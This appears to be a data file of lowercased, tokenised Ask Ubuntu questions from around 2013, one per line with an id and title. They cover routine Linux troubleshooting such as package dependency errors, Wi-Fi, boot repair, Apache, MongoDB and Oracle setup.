382285	problem while removing package from ubuntu 13.10	$ sudo apt-get -- purge remove libpixman-1-0 reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : libatk-wrapper-java : depends : default-jre but it is not going to be installed or java2-runtime recommends : libatk-wrapper-java-jni but it is not going to be installed e : error , pkgproblemresolver : :resolve generated breaks , this may be caused by held packages .
382286	13.10 virtual hosts file does n't work	i already know of the main .conf problem with ubuntu 13.10 and the change to apache 2.4 for the suffix to site-available files . my problem is that when i enable `` a2ensite xxxx '' for `` xxx.conf '' in `` sites-available '' folder , i get this message when i restart/reload apache : ( 98 ) address already in use : ah00072 : make_sock : could not bind to address [ : : ] :80 then i can `` a2dissite xxxx '' and get apache to run again . i do n't know why this is . my .conf file is as follows : # ensure that apache listens on port 80 listen 80 # listen for virtual host requests on all ip addresses namevirtualhost *:80 < virtualhost *:80 > serveradmin alex @ localhost.com documentroot /var/www/ethico/docroot servername ethico-r6.dev serveralias *.ethico-r6.dev www.ethico-r6.dev < /virtualhost > also for /etc/hosts : 127.0.0.1 *.ethico-r6.dev www.ethico-r6.dev 127.0.0.1 localhost thanks in advance for any help ! -alex
382288	options and setup before create a local repository	i 'm using 64 bits version of precise pangoling , i need to create a local repo but for the 64 bit of quantal quetzal , i think i have all the steps but i have some extra questions , i want to share them with you , suggestions are welcome : i just want the packages for 64 bit arch , how and where can i set this ? i need to include virtualbox repo , is this package on the official repos ? in case no , is there anyway to include it on my local repo ? my internet connection is not so fast as i would like , is there any `` minimal or standard configuration '' in order to not download the entire repos ? best regards
382290	issues with playing videos on the net	i re-installed ubuntu ( 12.04.3 ) a few days back . now with my previous install , i had no issue playing media ( this question is specific to videos for i have n't tried plain , audio files yet ) , but what happens now is , if i 'm watching a video on full screen and suppose it needs to buffer , and i exit the full screen mode , then the entire screen blanks out . it turns white and closing the lid of my laptop , any combination of keys , nothing , helps . on youtube , the screen is frozen with the last image of the video , at a later stage if the video has buffered , it 'll play with no video feedback , it 's simply stuck . on other pages , it turns , white . how can this be resolved ?
382292	lost ubuntu partition after reinstalling windows 7	i recently had to reinstall windows 7 over a dual boot . my ubuntu partition is no longer accessible . it still seems to show up when i use gparted from live usb . however , it 's unallocated space . i do n't know how to go about recovering the partition , if only i would to be able to browse through or grab some of the data i 'm temporarily lost . any help would be appreciated ! ! this is info generated by boot-repair from live ubuntu usb http : //paste.ubuntu.com/6477372/
382293	cant get ubuntu 13.10 to read my home wifi	i have ubuntu 13.10 installed on an external hard-drive . i have used it on another computer and could access the internet . but at home , i cant seem to find my home wifi , though i can see all other wifi in my building . i also have windows that i have no problem with accessing my home wifi .
382295	how can i cutomize a ubuntu-server image ?	i want to customize the ubuntu-13.10-server-amd64.iso image . my goal is to test this to see if i can get my usb keyboard to work at the second language dialog during installation ( i 've encountered this issue in the past before ) . but in order to do this i need to be able to edit /etc/initramfs-tools/modules in ubuntu-13.10-server-amd64.iso . i 've tried using uck but that failed with a can not mount /home/caleb/tmp/remaster-iso/casper/filesystem.squashfs in /home/caleb/tmp/squashfs-mount , error=32 which i found means uck only works for the desktop , not server or alternate isos . how to really customize an âubuntu-11.04-alternate-amd64.isoâ image ? asks how to customize an alternate image but the accepted answer just points to customizing a live-cd . the highest rated answer just talks about automating the installation with system-config-kickstart but i 'm not interesting in automating it . any help would be appreciated .
382296	can i install ubuntu along with another linux os ?	i would like to install ubuntu along with mageia 3 .
382298	e : error , pkgproblemresolver : :resolve generated breaks while uninstalling mono	i re-installed mono-runtime due to this error and it is solved . but now i want to uninstall it ( but in ubuntu 13.10 ) . so this is what happens : hogar @ hogar-desktop : ~ $ sudo apt-get purge mono-runtime reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : libgtk2.0-cil : depends : libmono-cairo4.0-cil ( > = 2.10.1 ) but it is not going to be installed depends : libmono-system-drawing4.0-cil ( > = 1.0 ) but it is not going to be installed libmono-corlib4.0-cil : depends : mono-runtime ( > = 2.10.8.1 ) but it is not going to be installed depends : mono-runtime ( < 2.10.8.2 ) but it is not going to be installed recommends : libmono-i18n-west4.0-cil but it is not going to be installed libmono-system-web-services4.0-cil : depends : libmono-system-configuration4.0-cil ( > = 1.0 ) but it is not going to be installed depends : libmono-system-enterpriseservices4.0-cil ( > = 1.0 ) but it is not going to be installed depends : libmono-system-web4.0-cil ( > = 2.10.3 ) but it is not going to be installed libmono-system4.0-cil : depends : libmono-security4.0-cil ( > = 2.10.1 ) but it is not going to be installed depends : libmono-system-configuration4.0-cil ( > = 1.0 ) but it is not going to be installed depends : mono-runtime ( > = 2.10.8.1 ) but it is not going to be installed depends : mono-runtime ( < 2.10.8.2 ) but it is not going to be installed monodoc-manual : depends : monodoc-browser but it is not going to be installed or monodoc-http but it is not going to be installed or monodoc-viewer e : error , pkgproblemresolver : :resolve generated breaks , this may be caused by held packages . i looked at this very popular post but in this case i 'm not installing a package . so not very sure any idea ? additional info : my /var/log/dist-upgrade/apt.log file is empty . the command dpkg -- get-selections | grep hold returns nothing
382301	how to install opengl version 2.0	how can i install opengl 2.0 on ubuntu ? long version : this ububtu is running in a vm ( vmware ) . i wanted to use kivy for developing a gui . i encountered many errors . i have searched around and those errors are gone . now i get minimum required opengl version ( 2.0 ) not found ! error . i have installed : sudo apt-get install build-essential sudo apt-get install python-setuptools sudo apt-get install python-pygame sudo apt-get install python-opengl sudo apt-get install python-gst0.10 sudo apt-get install python-enchant sudo apt-get install gstreamer0.10-plugins-good sudo apt-get install cython sudo apt-get install python-dev sudo apt-get update -- fix-missing sudo apt-get install libgl1-mesa-dev sudo apt-get install libegl1-mesa-dev sudo apt-get install libgles2-mesa sudo apt-get install libgles2-mesa-dev sudo pip install kivy and kivy is installed successfully .
382302	mongodb could not connect local server	i had mongdb installed and evrything was working fine . i wanted to delete the mongodb lock . by mistake the directory /var/lib/mongodb/ got deleted . so , i uninstalled mongo db and installed again . but now i always keep getting this error : error : could n't connect to server 127.0.0.1:27017 at src/mongo/shell/mongo.js:145 exception : connect fail the error remains same even if i try to login from terminal or rockmongo or my application . i am using ubuntu12.04 and have latest version of mongo .
382303	boot from the rsync backup copy	i have made a rsync backup of system using command rsync -aaxv /* /media -- exclude= { /dev/ , /proc/ , /sys/ , /tmp/ , /run/ , /mnt/ , /media/* , /lost+found } and now i want to boot from it . i have edited the fstab inside the /media/etc/fstab but when booting the valid drive can not be found . please help me .
382304	how to give a normal user access only to the /var/log directory ?	i have a non-admin user in ubuntu 12.04 lts desktop 32-bit os to whom i need to give permissions only to access /var/log as he needs to monitor logs and create reports related to it . i do not want to give him admin access at any cost . how can i achieve this ?
382306	folder mounting in windows server	ubuntu join to windows domain single ubuntu system how to map drive multiple user login drive auto mapping 1.one ubuntu system join to windows domain how to map folder user shared folder in server auto login to mount automatically 2.different user login that system different folder shared all user so how to map automattically any user login to map that user folder automatically please help me ... ... ... ... ... ... ... ... .
382307	how to add awesome on session list	dear experts i am new to ubuntu . i am using gnome shell and willing to use awesome windows manager . i am supposed to search for the tutorials before asking here and i did a lots of googling and their tutorials . what i felt is they have only focused on how to configure awesome . i want to see awesome on my session list . i already did a lot of things as they say but did n't work out please make an easy tutorial .
382310	upload files with scp	when i try to upload files to may desktop machine from my linux server with scp i get below error scp username @ desktop-machine-name : < path to upload file on desktop > error : ssh : connect to host desktop-machine-name port 22 : connection refused lost connection
382311	executing vi on directory does not list files	this seems like a new bug ( feature ? ) thatâs creep into ubuntu 13.10 . when i execute vi on a directory it does n't list the files which i can navigate to with the arrow keys ; it just shows an empty screen with the message 'illegal filename ' . now it 's an hassle because i have to ls the directory first if i do n't know which file i want to edit and then i 've got to type the entire file name after the directory in the command argument . this happens when i go to vi the tmp , etc , and even in my home directory which i have write permission for .
382313	how to diassmble an .exe file within ubuntu ?	i have to diassemble a .exe file . now , i can open the .exe file in hex-editor like bless or ghex . but then , how to use the objdump to convert it to assembly language ?
382314	installing ubuntu 12.10 on gateway pc intel i3	i have a gateway pc with intel core i3 . i 'm trying to install ubuntu 12.04 - 12.10 and unable to install any of them . some messages mention that only the 64-bit version of 12.10 release works with uefi . however the only 64-bit version that can be downloaded from ubuntu website is based on amd platform . bummer ! can someone please help ?
382317	how to connect sony xperia l in mtp mode with ubuntu 13.10 ?	i want to connect sony xperia l in mtp mode with ubuntu 13.10 . i do n't have any sdcard so i ca n't connect xperia l in mass storage mode .
382318	keyboard and mouse dead after rebooting from live cd to windows	ubuntu 13.04 live cd was trying to disconnect all usb devices while shutting down and suddenly my power went off.now when i booted to windows 7 , my usb keyboard and mouse are not working.i tried plugging them back but did n't work.please help .
382323	built-in monitor turned off after connected to projector	my laptop built-in monitor always turned off when connected to secondary screen using vga cable , and it wont turn on again after the cable unplugged . however the problem persist only when i 'm logged in x , multi monitor works perfect on virtual terminal ( ctrl + alt + f1-f6 ) . the only way to turn it on again is restart lightdm service via virtual monitor ( sudo service lightdm restart ) . i 'm on 13.10 , and i dont have this problem in 13.04 . how to solve this ?
382325	ubuntu : no wifi option in my system- > network option	i have an ubuntu 12.04 lts box but in system- > network option i do not see wifi option . i am trying to make us of ralink wifi dongle but not sure how to use it ? # lsusb bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 002 : id 148f:5370 ralink technology , corp. rt5370 wireless adapter bus 004 device 002 : id 13ee:0001 mosart # iwconfig lo no wireless extensions . ra0 ralink sta essid : '' '' nickname : '' rt2870sta '' mode : auto frequency=2.412 ghz bit rate=1 mb/s rts thrff fragment thrff encryption keyff link quality=10/100 signal level:0 dbm noise level:0 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:0 missed beacon:0 eth0 no wireless extensions .
382327	ubuntu desktop not coming up after upgrade	i have ubuntu 12.10 . after upgrade ubuntu desktop is not coming up . i just entered with `` startx '' command and getting below error '' fatal server error : no screens found..etc.. ( ee ) please also check the log file at /var/log/xorg.0.log '' for additional information '' xinit : giving up xinit : unable to connect to x server : connection refused xinit : server error could you please let me know what to be done next .
382330	is gksudo still in use , if not what is the replacment ?	is gksudo still in use or is it officially removed ? it is still available in the ubuntu tutorial : ( https : //help.ubuntu.com/community/beginners/bashscripting ) and what would be the replacement for it ? also what did the gk part stand for ? graphical ? edit : gksudo was removed a replacment for it would be sudo -i
382331	xubuntu reopens last session applications even though it should n't	there 's something strange going on with my xubuntu setup ( 13.10 at the moment , but i remember having this issue in 13.04 as well , before upgrading ) . each time i log in , the system reopens the applications that i did n't close before shutting down the computer last time . this is strange since in the session and startup settings i do n't have the automatically save session on logout setting checked . what can i do to fix this issue ?
382332	ubuntu 10.04 - tips for upgrade ?	i have ubuntu 10.04 . linux 2.6.32-21-generic # 32-ubuntu smp fri apr 16 08:10:02 utc 2010 i686 gnu/linux my machine is configured to the hilt , and i have all sorts of strange things installed and running on it . what best practices do you recommend for backing it up , wiping it , and installing 13.10 ? i would like to spend as little time as possible on this , but i would like all my ol ' applications and such reinstalled , too . i have a list of all of my installed applications here : http : //www.pastebay.net/1360380
382334	deleting a directory + unlinking the files	i have a folder with many files those have a few sym links pointing to them like /some_path - > /dir/file1 /some_path2 - > /dir/file2 /some_path3 - > /dir/file3 but i do n't remember neither the some_paths no which files from dir have sym links pointing to them . now i need to delete dir ( i really need it for some reason ) . and i also want no file to point to any file from dir since i 'll delete it . how do i unlink those files ? what if i just delete dir , will they unlink by themselves ?
382336	widget in ubuntu and notification app	what are the widget software available for ubuntu . i want application providing these basic widgets like 1.calender 2.world clock 3.currency converter 4.music player ( having widget option ) 5.social network ticker any all in one widget app ? new to ubuntu .
382342	i can not get 'motion ' working ... seems to ignore changes to .conf file	i am trying to use 'motion ' to setup some simple video surveillance in ubuntu 12.10 . i installed motion and edited the /etc/motion/motion.conf file , but it seems like the program is ignoring the changes i made to the .conf file . first , i set the video device to /dev/video1 ( a tested and working usb cam ) but it is still using /dev/video0 ( the built-in laptop cam ) second , i set the camera resolution to 640x480 but it is capturing files that are 320x240 third , i set the framerate to 2 frames/second but it is recording about 10 frames/second forth , i set the target directory to a directory i created : /media/work drive/motion capture/ but it is writing all the jpg files to the root directory instead . i checked to make sure the user 'motion ' was created and added to the group 'video ' and it was . what am i doing wrong ? i followed the instructions on the motion website as well as a few youtube tutorials ... but it is still not working ... it seems like all my changes to the motion.conf file are being ignored . i am desperate ... i need to get this up and running today . hope someone can help ... thanks : - )
382344	ubuntu 14.04 : fine tuning touchpad for thinkpad s431	i am using ubuntu 14.04 on lenovo thinkpad s431 . the touchpad is very bumpy , tricky to use . slides down with a small touch , sometimes jerks erratically . i have tried to modify the settings in /usr/share/x11/xorg.conf.d/50-synaptics.conf file as below -- section `` inputclass '' identifier `` touchpad catchall '' driver `` synaptics '' matchistouchpad `` on '' matchdevicepath `` /dev/input/event* '' option `` jumpycursorthreshold '' `` 250 '' option `` vertresolution '' `` 100 '' # option `` horizresolution '' `` 65 '' # option `` minspeed '' `` 1 '' # option `` maxspeed '' `` 1 '' # option `` accelerationprofile '' `` 1 '' # option `` adaptivedeceleration '' `` 8 '' # option `` constantdeceleration '' `` 1 '' # option `` velocityscale '' `` 128 '' option `` horizhysteresis '' `` 150 '' option `` verthysteresis '' `` 150 '' endsection there are lots of options here , does anyone know how to get a fine-tuned values for the above options ( for thinkpad s431 ) ? the hysteresis values seems to alleviate the problem a little bit , but failed to get a perfect result . edit : according to this bug report for thinkpad x230 ( +x230t ) , i set these values and quite good for now -- option `` vertresolution '' `` 100 '' option `` horizresolution '' `` 65 '' option `` minspeed '' `` 1 '' option `` maxspeed '' `` 1 '' option `` accelerationprofile '' `` 2 '' option `` adaptivedeceleration '' `` 16 '' option `` constantdeceleration '' `` 16 '' option `` velocityscale '' `` 32 '' option `` horizhysteresis '' `` 50 '' option `` verthysteresis '' `` 50 '' and then you need to increase the cursor speed manually from the unity mouse settings . but i am still looking for a fully functional ( possibly with all the gestures ) and a fine-tuned touchpad settings for s431 . further help is appreciated .
382345	oracle database 11g on 12.04 issues	i 've been attempting to setup oracle on 12.04 , but i 've run into some issues . i 've been using http : //geeksharing.blogspot.com/2011/02/installing-oracle-database-11gr2-on.html as a guide and it has worked well so far . i run the following su - oracle and receiving the following -su : ulimit : open files : can not modify limit : operation not permitted using the same guide , i run the following cd database ./runinstaller i get stuck at software location : `` /u01/app/oracle/product/11.2.0/dbhome_1 '' i tells me [ ins-32012 ] unable to create directory . i 've been looking around a bunch and have n't found a fix . thanks in advance for the help .
382346	run a specific program as root without asking for password everytime	i am using ubuntu 12.04 lts and many times , i need to connect modem using sakis-3g script and because modem-manager sucks many times . i need to supply admin/root password , everytime i need to run sakis-3g script . i am the only user on the laptop . i want ubuntu to remember my password forever for this specific application , even after reboot . so , when next time i run this application , it run without asking for password . please tell me step by step procedure , so that i can understand well . i want to ask for password for other applications , but not to ask for password for this application only thanks to all .
382348	find a symbolic link or a record in `` ~/.bashrc '' for a file	i have some command i can run directly from the terminal : my_command and it runs well . however , i want to disable it to run this way . i know where it 's located : which my_command and it gives me the location of the file of my_command . however , how do i figure out where is a symbolic link pointing to it and letting it run vai terminal without specifying the full path ? or a record in a file like ~/.bashrc . where else do i look for it ? i looked for a link or a record for my_command in /usr/bin and ~/.bashrc but did n't find anything . but it might also mean that i just could n't find it .
382349	different types of file systems for the booting partition	when setting a partition to be bootable ( i.e . setting the bootable flag = on ) , is it necessary to set it 's file system as : reserved bios boot area or efi boot partition ? the problem i 'm facing is that i 've installed ubuntu server 12.04 numerous times and each time after the installation complete , i reboot and the server reports that there are no boot devices are available . the server has 2 boot menus ( i.e . moods ? ) which are : bios uefi i 'm not sure whether to boot from the usb in uefi or bios mood ? will that effect the type of file system i should choose for the bootable partition ? basically , why does n't the os load after it 's installed ? !
382353	where can i find ibus `` keyboard input methods '' ?	earlier i used to activate bangla ( unijoy ) layout from ibus preference . accessed ibus keyboard input methods , ibus preference would only show up a handful of chinese scripts . i had to install `` ibus-m17n '' to get the whole package which included the unijoy layout . however , starting 13.10 , i ca n't find the ibus preference/keyboard input method screen at all . it 's been replaced by text entry field , where there are bengali layouts but not unijoy . terminal shows that ibus is installed but i ca n't bring up the front-end . i even installed ibus-m17n but still the unijoy layout does n't show up . i know it would n't matter for a lot of people here since it 's just a local language , but i need it . i 'm a journalist and run a few bilingual websites where i need to write a lot -- that includes bangla and english . i must write bangla using the layout that i -- and a lot of people over here -- am familiar with most .
382354	second network interface fails to start : pre-start killed by term	running ubuntu server 12.04.3 lts on our vmware cluster . after adding a second nic i face the following problems . when booting not both interfaces are coming up only one of them and the weird thing is it is random which interface . i than have to manually ifup the corresponding interface . the /etc/network/interfaces is correctly setup . allready looked at dmesg , kern.log and boot.log only error i can find is : [ 5.952693 ] init : network-interface ( eth0 ) pre-start process ( 679 ) killed by term signal
382357	ubuntu 13.10 slow boot nvidia graphics card	my boot time takes almost 2 mins and i have tested it with bootcharts and it is shown below . i do not know what is wrong and it started appearing only when i installed the drivers for my nvidia graphics card . how do i start to make my computer boot faster and make it more stable ? it hangs often but is fine after suspending or sleeping it . bootchart image for asusa42j
382358	lubuntu - unexplained message when hibernating - several users logged in but i 'm the only one using it	since quite recently , my laptop does n't hibernate properly . whenever i want to select an option , i get a message saying you need to authenticate as a super user to hibernate while several users are logged in . but i 'm actually the only one using this laptop . i could try some workarounds like this one : how can i make shutdown not require admin password ? but i 'd rather understand why i get this message , why did it suddenly changed ( since an update , a program installation ? i do n't know ... ) here 's the result of a who -a command : $ who -a démarrage système 2013-11-25 14:08 niveau d'exécution 2 2013-11-25 14:08 identifiant tty4 2013-11-25 14:08 1051 id=4 identifiant tty5 2013-11-25 14:08 1055 id=5 identifiant tty2 2013-11-25 14:08 1067 id=2 identifiant tty3 2013-11-25 14:08 1068 id=3 identifiant tty6 2013-11-25 14:08 1071 id=6 augustin + tty7 2013-11-25 14:08 ancie 1335 ( :0 ) identifiant tty1 2013-11-25 14:08 2050 id=1 augustin + pts/1 2013-11-26 09:39 . 3051 ( :0 ) augustin + pts/3 2013-11-25 14:46 18:53 3051 ( :0 ) augustin + pts/4 2013-11-25 17:14 14:22 3051 ( :0 ) augustin + pts/7 2013-11-25 17:14 13:58 3051 ( :0 ) augustin + pts/8 2013-11-25 17:14 13:53 3051 ( :0 ) augustin + pts/10 2013-11-25 17:14 15:52 3051 ( :0 ) augustin + pts/11 2013-11-25 17:14 16:23 3051 ( :0 ) could it be related to the identifiant lines ? i reckon they may correlate the login prompt when pressing ctrl + alt + f1 etc . thanks
382360	trouble with saucy salamander boot-up	just updated to saucy salamander and it wo n't boot . gets stuck at the six dots under the ubuntu word with the purple screen . i have to hard crash and select linus 3. something for restart . after the first time , i shut down normally and then restarted , hoping it would boot properly , but it did n't , had to hard crash again and select 3. something again . how do i convince ubuntu 13.10 to boot normally ?
382365	unment dependencies when installing gedit	i am using ubuntu 13.10 . gedit is gone , and when i try to install it again i get a dependency error : the following packages have unmet dependencies : gedit : depends : gedit-common ( < 3.9 ) but 3.10.1-0ubuntu1~saucy1 is to be installed e : unable to correct problems , you have held broken packages . how do i resolve this problem ?
382367	smart scopes run-order	using smart scopes on my desktop ubuntu 13.10 , i noticed that sometimes ( typically the first time i search for something using dash ) applications installed on my system take a backstage to online recommendations ( shopping , for sure , but also my online files etc. ) . that is , i 'd type in the name of an application , and for some reason online suggestions would appear first ; not until after several seconds have passed do i get the obvious suggestion : the app itself . following @ warrenhill 's very good answer here , i 'm able to disable the online scope and see that it should n't really take this long for application-suggestions to come up . hence , this is n't some fifo architecture ( which i 'd be fine with ; as long as there are n't any local results , i do n't mind seeing online suggestions ) ; having the online scopes enabled actually slows down getting the result i want . however , that does n't mean i 'd never like to get online suggestions . in fact , i kind of like them ; they 're just much less useful to my everyday work than local results . so , my question is : is there any way of specifying run-order for scopes ? can i stop dash from seeking online suggestions until after all local results were gathered ?
382370	wireless lan connection stops working after 3 pings or after loading one web page	my boss asked me to install ubuntu 12.04 lts 32 bit on an old-ish laptop with an external us robotics wifi card and an internal ethernet card . i have gone through all the painful hops about installing the wifi card driver , then suceeded getting wpa-supplicant to make it connect . then i installed lubuntu because i need to use firefox on it . no network manager or anything , as the graphic interface will only be invoked once a week and this laptop works as an `` always on '' database slave . now , i have several issues : i can only issue 1 ping before it completely stops communicating . that ping shall show 3 successful low latency replies then hangs till i ctrl-c it . otherwise , i may succesfully open one ( 1 ) web page in firefox and then it completely stops communicating . while i am at it : i need the wlan to be the main interface . the internal ethernet interface gets only connected once a week . when it happens , it should be possible to telnet into it from other computers . the first two issues seem related and also look like this previous question with the big difference i do n't have network manager so i do n't know where to look . that computer is terminal only with an afterwards attached thin graphic install . for the second issue , i do n't know how to create the configuration to let it work . as of now both interfaces are unreachable from our lan and i do n't know if it 's due to the first issues or not . in order to try debug the situation i have commented the built in ethernet adapter but i have not seen any benefit on the other . the wlan must be always on since boot and shall have a fixed ip address . i am posting some of my ( anonymized ) configs below , if you are so kind to help me i 'll post other configs as you feel fit to ask . thanks in advance . configs : /etc/hosts 127.0.0.1 localhost # 192.168.1.9 lxsrv01.domain.tld lxsrv01 dbserver 192.168.1.10 lxsrv01.domain.tld lxsrv01 dbserver # the following lines are desirable for ipv6 capable hosts : :1 ip6-localhost ip6-loopback fe00 : :0 ip6-localnet ff00 : :0 ip6-mcastprefix ff02 : :1 ip6-allnodes ff02 : :2 ip6-allrouters resolv.conf nameserver 8.8.8.8 nameserver 8.26.56.26 nameserver 156.154.70.22 search domain.tld home root @ lxsrv01 : ~ # route -n kernel ip routing table destination gateway genmask flags metric ref use iface 0.0.0.0 192.168.1.1 0.0.0.0 ug 0 0 0 wlan0 0.0.0.0 192.168.1.1 0.0.0.0 ug 100 0 0 wlan0 192.168.1.0 0.0.0.0 255.255.255.0 u 0 0 0 eth0 192.168.1.0 0.0.0.0 255.255.255.0 u 0 0 0 wlan0 root @ lxsrv01 : ~ # ifconfig eth0 link encap : ethernet hwaddr 00:0e : a6 : aa:5b : be inet addr:192.168.1.9 bcast:192.168.1.255 mask:255.255.255.0 up broadcast running multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:16 errors:0 dropped:0 overruns:0 frame:0 tx packets:16 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:1140 ( 1.1 kb ) tx bytes:1140 ( 1.1 kb ) wlan0 link encap : ethernet hwaddr 00 : c0:49 : fc : db:3f inet addr:192.168.1.10 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :2c0:49ff : fefc : db3f/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:14799 errors:0 dropped:0 overruns:0 frame:0 tx packets:4043 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:7354838 ( 7.3 mb ) tx bytes:440079 ( 440.0 kb ) root @ lxsrv01 : ~ # grep -i `` wlan '' /var/log/dmesg [ 14.360963 ] b43-phy0 : broadcom 4318 wlan found ( core revision 9 ) [ 17.601221 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready [ 18.912230 ] wlan0 : authenticate with 74:88:8b:84 : e8 : ad [ 18.912550 ] wlan0 : send auth to 74:88:8b:84 : e8 : ad ( try 1/3 ) [ 18.914068 ] wlan0 : authenticated [ 18.916034 ] wlan0 : associate with 74:88:8b:84 : e8 : ad ( try 1/3 ) [ 18.920557 ] wlan0 : rx assocresp from 74:88:8b:84 : e8 : ad ( capab=0x411 status=0 aid=3 ) [ 18.921071 ] wlan0 : associated [ 18.921268 ] ipv6 : addrconf ( netdev_change ) : wlan0 : link becomes ready
382371	deja-dup keeps asking me for my password every few minutes and does n't seem to be doing anything	every time i run deja-dup it repeatedly asks me for my password every few mintues . also , in the 'detals ' screen it just shows the same files and does n't seem to scan any new ones . any thoughts or ideas ? i 'm running xubuntu 12.04 64-bit .
382372	how can i implement tilda functionality in byobu ?	what i really like about tilda is teh keybinding allowing me to pop it on top of whatever i 'm working on and then after i finish with my terminal commands make it run in the background . is it possible to achieve this functionality in byobu ?
382375	when piping output to a file , why are stderr and stdout in the wrong order ?	i have a perl script : warn `` 1\n '' ; print `` 2\n '' ; warn `` 3\n '' ; print `` 4\n '' ; i pipe the output to a file : perl script.pl & > foo cat foo : 1 3 2 4 why is n't the output in order , and how do i fix it ?
382377	need software for lan acces with password , or something like that	need a software that make possible acces betwen gnu/linux [ ubuntu 12.04 ] and windows xp/7 ! something like that : windows pc linux [ server ] linux pc user 1 ( acces with login and pasword ) [ map ] user1 user 2 ( acces with login and pasword ) [ map ] user2 user 3 ( free acces / only read ) [ map ] media ( for all users ) [ map ] ( info ) ( read/write ) user 1 i do n't know maybe exist something by default in linux , better for me will be a software with grafical interface , anyway - all ideas are welcome , thanks !
382380	installing oracle 11g r2 express edition on ubuntu 64-bit	i 'm attempting to use oracle express using http : //meandmyubuntulinux.blogspot.in/2012/05/installing-oracle-11g-r2-express.html as a guide , but i run into an issue . sudo cat /etc/sysctl.d/60-oracle.conf # oracle 11g xe kernel parameters fs.file-max=6815744 net.ipv4.ip_local_port_range=9000 65000 kernel.sem=250 32000 100 128 kernel.shmmax=536870912 sudo service procps start procps stop/waiting i verify the change , sudo sysctl -q fs.file-max fs.file-max = 65535 but fs.file-max = 65535 =/= 6815744 how do i make the change ? thanks for help in advance .
382384	installing ubuntu desktop cd 12.04.3-32bit without installing grub	i want to install ubuntu desktop 12.04.3-32bit without installing grub.i have googled for the same and found ( installing ubuntu 12.04 without installing grub ) , tried the same like below but it does not help linux /casper/vmlinuz file=/cdrom/preseed/ubuntu.seed boot=casper only-ubiquity ubiquity -- no-bootloader quiet splash -- i can able to achieve the same with alternate cd image with preseed and desktop image with preseed but am in a position that i have to achieve desktop image without preseed . please help me on this regards senthil
382387	no internet connection when getting out of hibernation	lately when i 'm returning to ubuntu 13.10 from hibernation i get no internet connection . the networking is off and i ca n't get it to turn on unless i suspend the computer and then resume usage . any idea on what that could be and how i could fix it ? thanks .
382389	how do i install libreoffice on 10.04 server ?	i follow @ seth 's answer to install libreoffice4 on the server . how do i install libreoffice 4 ? i run dpkg -i *.deb without any error ( as root ) . then i did n't see any desktop-integration folder . then nothing . there is no libreoffice command . basically , i try to use libreoffice to run in server mode , and convert odt file to pdf file ( with python subprocess module ) . i can do that locally , but i can not figure out how to install libreoffice on the server , where there is no gui . any ideas ?
382394	how do i install the tor browser bundle in ubuntu ?	in ubuntu 13.04 i used the following ppa to install the 64-bit tor browser bundle . however , in ubuntu 13.10 it does n't work anymore . sudo add-apt-repository ppa : upubuntu-com/tor64 sudo apt-get update sudo apt-get install tor-browser sudo chown $ user -rv ~/.tor-browser/ how do i install the tor browser bundle in ubuntu ( 13.10 ) ?
382397	mount from rc.local fails ; how to do it properly ?	here is my current /etc/rc.local : # ! /bin/sh -e # test 1 echo line1 > /home/myhome/rclog.txt # the mount mount /mnt/mediadrive & > /home/myhome/mountlog.txt # test 2 echo line2 > > /home/myhome/rclog.txt exit 0 the /mnt/mediadrive is a noauto in fstab . it is a network share , hence the mount in rc.local . the mount in the above script does not work at boot . after boot , the rclog.txt file contains both line1 and line2 , and the mountlog.txt file is empty . this would indicate that all commands in the script were run successfully , however , the drive is not mounted . running sudo /etc/rc.local manually in a terminal does mount the network share . there is nothing relevant in /var/syslog that i can see , and permissions for rc.local are 755 . the relevant fstab entry : //192.168.1.100/home /mnt/mediadrive cifs noauto , credentials=/home/myhome/.mediacredentials , uid=myname , gid=mygroup 0 0 what 's going on here ?
382399	problem with boot repair	i am new to linux . i have just installed ubuntu 12.04 lts along windows 7 . i followed all the steps to install until i received a message that ubuntu is successfully installed and restart your computer . but after i restart my computer it directly start windows and do not ask for selecting any os . i have also try to repair grub using boot repair but i am getting an error in boot repair i got a message to write following command in terminal sudo chroot `` mnt/boot-sav/mapper/isw_dgbdcafbee_wd_wmc1s6601985p10 '' dpkg -configure-a sudo chroot `` mnt/boot-sav/mapper/isw_dgbdcafbee_wd_wmc1s6601985p10 '' apt -get install -fy sudo chroot `` mnt/boot-sav/mapper/isw_dgbdcafbee_wd_wmc1s6601985p10 '' apt -get install -y -force -yes dmraid sudo chroot `` mnt/boot-sav/mapper/isw_dgbdcafbee_wd_wmc1s6601985p10 '' apt -get purge -y -force -yes -grub*-common but i wrote this in terminal i am getting again a message in terminal that can not change root directory as sudo chroot mnt/boot-sav not found
382400	place compiz static application switcher always on a certain monitor	variants of this question have been asked , namely , how to place the switcher on both monitors when using compiz and when using unity , neither are possible from what i see . having it on both monitors would be great but i would also be happy to have it on a fixed monitor , so your eyes do n't need to jump , or at least on the monitor that has the mouse . ( for the mouse part , i found this bug , but with little activity and older compiz . i 'm using 12.04 , compiz 0.9.7.12-0ubuntu3 ) i want to propose yet another workaround , but for which i need help , namely , to use the `` place '' compiz plugin that seems to be able to force placement on the monitor with the mouse . but to do it i need the class of the static switcher window , how can i find it ?
